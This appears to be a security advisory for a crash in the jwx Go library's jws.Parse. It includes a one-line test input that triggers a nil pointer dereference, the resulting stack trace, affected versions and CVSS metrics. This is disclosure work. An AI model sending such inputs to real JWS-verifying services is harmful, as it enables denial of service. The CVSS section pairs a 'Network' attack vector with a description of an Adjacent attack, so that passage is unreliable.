Calling jws.Parse with a JSON serialized payload where the signature field is present while protected is absent can lead to a nil pointer dereference.
This seems to also affect other functions that calls Parse internally, like jws.Verify.
My understanding of these functions from the docs is that they are supposed to fail gracefully on invalid input and don't require any prior validation.
Based on the stack trace in the PoC, the issue seems to be that the processing done in jws/message.go:UnmarshalJSON() assumes that if a signature field is present, then a protected field is also present. If this is not the case, then the subsequent call to getB64Value(sig.protected) will dereference sig.protected, which is nil.
Reproducer:
package poc
import (
"testing"
"github.com/lestrrat-go/jwx/v2/jws"
)
func TestPOC(t *testing.T) {
_, _ = jws.Parse([]byte(`{"signature": ""}`))
}
Result:
$ go test
--- FAIL: TestPOC (0.00s)
panic: runtime error: invalid memory address or nil pointer dereference [recovered]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x5fd618]
goroutine 6 [running]:
testing.tRunner.func1.2({0x628800, 0x831030})
/usr/local/go/src/testing/testing.go:1545 +0x238
testing.tRunner.func1()
/usr/local/go/src/testing/testing.go:1548 +0x397
panic({0x628800?, 0x831030?})
/usr/local/go/src/runtime/panic.go:914 +0x21f
github.com/lestrrat-go/jwx/v2/jws.getB64Value({0x0?, 0x0?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:484 +0x18
github.com/lestrrat-go/jwx/v2/jws.(*Message).UnmarshalJSON(0xc0000a2140, {0xc0000ec000, 0x11, 0x200})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/message.go:323 +0x4ad
encoding/json.(*decodeState).object(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0x16?})
/usr/local/go/src/encoding/json/decode.go:604 +0x6cc
encoding/json.(*decodeState).value(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0xc00006e630?})
/usr/local/go/src/encoding/json/decode.go:374 +0x3e
encoding/json.(*decodeState).unmarshal(0xc0000ea028, {0x64fa60?, 0xc0000a2140?})
/usr/local/go/src/encoding/json/decode.go:181 +0x133
encoding/json.(*Decoder).Decode(0xc0000ea000, {0x64fa60, 0xc0000a2140})
/usr/local/go/src/encoding/json/stream.go:73 +0x179
github.com/lestrrat-go/jwx/v2/internal/json.Unmarshal({0xc00001a288, 0x11, 0x11}, {0x64fa60, 0xc0000a2140})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/internal/json/json.go:26 +0x97
github.com/lestrrat-go/jwx/v2/jws.parseJSON({0xc00001a288, 0x11, 0x11})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:588 +0x50
github.com/lestrrat-go/jwx/v2/jws.Parse({0xc00001a288, 0x11, 0x11}, {0x0?, 0xc00006e760?, 0x48450f?})
/home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:525 +0x89
poc.TestPOC(0x0?)
/home/fredrik/src/jwx_poc/poc_test.go:10 +0x57
testing.tRunner(0xc0000e4340, 0x68ef30)
/usr/local/go/src/testing/testing.go:1595 +0xff
created by testing.(*T).Run in goroutine 1
/usr/local/go/src/testing/testing.go:1648 +0x3ad
exit status 2
FAIL poc 0.005s
The vulnerability can be used to crash / DOS a system doing JWS verification.
NULL Pointer Dereference
NULL Pointer Dereference
NULL Pointer Dereference
| Package | Type | OS Name | OS Version | Affected Ranges | Fix Versions |
|---|---|---|---|---|---|
| github.com/lestrrat-go/jwx | golang | - | - | >=1.0.8 | Not yet available |
| github.com/lestrrat-go/jwx/v2 | golang | - | - | <v2.0.19 | v2.0.19 |
| github.com/lestrrat-go/jwx/v2/jws | golang | - | - | <=v2.0.18 | v2.0.19 |
CVSS:3 Severity and metrics
The CVSS metrics represent various qualitative aspects of a vulnerability that influence the overall score above.
Attack Vector (AV)
Network
The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
Attack Complexity (AC)
Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
Privileges Required (PR)
None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction (UI)
None
The vulnerable system can be exploited without interaction from any user.
Scope (S)
Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.
Confidentiality (C)
None
There is no loss of confidentiality.
Integrity (I)
None
There is no loss of trust or accuracy within the impacted component.
Availability (A)
High
There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component.
3.9
2.8
-
2.8
CGA-2hmw-5x4m-2cqg
-
CGA-373g-57qg-xxx4
-
CGA-3hmh-6hmr-cg6g
-
CGA-3p3g-cgmf-q7jr
-
CGA-3pwf-85g3-7hwx
-
CGA-4cv5-4r6g-v48v
-
CGA-3pp9-f8mv-3662
-
CGA-4jxf-wcrx-p97c
-
CGA-4h4f-7c26-wph6
-
CGA-54p3-g93g-w3gh
-
CGA-5f62-fvxx-5fvh
-
CGA-57v2-mmmr-jq8g
-
CGA-55fg-w2x9-5959
-
CGA-96jc-4g66-92pf
-
CGA-g2wx-wqp3-m77w
-
CGA-hj99-38vq-hf2x
-
CGA-hj5p-q245-hx5j
-
CGA-hx64-r6pw-g756
-
CGA-jfrc-jjm2-6m26
-
CGA-jwf8-589j-v6hx
-
CGA-pc95-j683-rw5m
-
CGA-rpgf-46xv-22fc
-
CGA-rv75-x49x-qg7v
-
CGA-rjc7-4vhw-626h
-
CGA-vcf8-vmw8-5h5m
-
CGA-vj65-w6g4-3hxv
-
CGA-wcq8-xq83-7jc4
-
CGA-wxgp-q82w-qf4j
-
CGA-wxvj-jgxc-w3x5
-
CGA-w2v2-x5jw-cm43
-
CGA-wrc3-34rr-5v3r
-
-
-